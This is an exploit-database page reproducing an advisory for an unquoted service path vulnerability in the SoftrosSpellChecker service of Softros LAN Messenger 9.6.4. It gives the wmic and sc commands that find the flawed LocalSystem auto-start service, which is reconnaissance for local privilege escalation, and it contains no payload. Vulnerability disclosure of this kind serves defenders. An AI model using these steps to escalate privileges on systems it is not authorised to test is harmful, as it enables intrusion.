Softros LAN Messenger 9.6.4 Unquoted Service Path

CVE	Category	Price	Severity
CVE-2019-19900	CWE-428	$3,000	High

Author	Risk	Exploitation Type	Date
Gjoko Krstic	High	Local	2021-02-25

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021020153

Below is a copy:

Softros LAN Messenger 9.6.4 Unquoted Service Path

# Exploit Title: Softros LAN Messenger 9.6.4 - 'SoftrosSpellChecker' Unquoted Service Path
# Discovery by: Victor Mondragn
# Discovery Date: 23-02-2021
# Vendor Homepage: https://www.softros.com/
# Software Links : https://download.softros.com/SoftrosLANMessengerSetup.exe
# Tested Version: 9.6.4
# Vulnerability Type: Unquoted Service Path
# Tested on: Windows 10 Pro 64 bits

# Step to discover Unquoted Service Path: 
 

C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" |findstr /i /v """
Softros Spell Checker           SoftrosSpellChecker     C:\Program Files (x86)\Softros Systems\Softros Messenger\Spell Checker\SoftrosSpellChecker.exe      Auto

C:\>sc qc SoftrosSpellChecker
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: SoftrosSpellChecker
        TIPO               : 10  WIN32_OWN_PROCESS
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 0   IGNORE
        NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Softros Systems\Softros Messenger\Spell Checker\SoftrosSpellChecker.exe
        GRUPO_ORDEN_CARGA  : System Reserved
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : Softros Spell Checker
        DEPENDENCIAS       :
        NOMBRE_INICIO_SERVICIO: LocalSystem

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum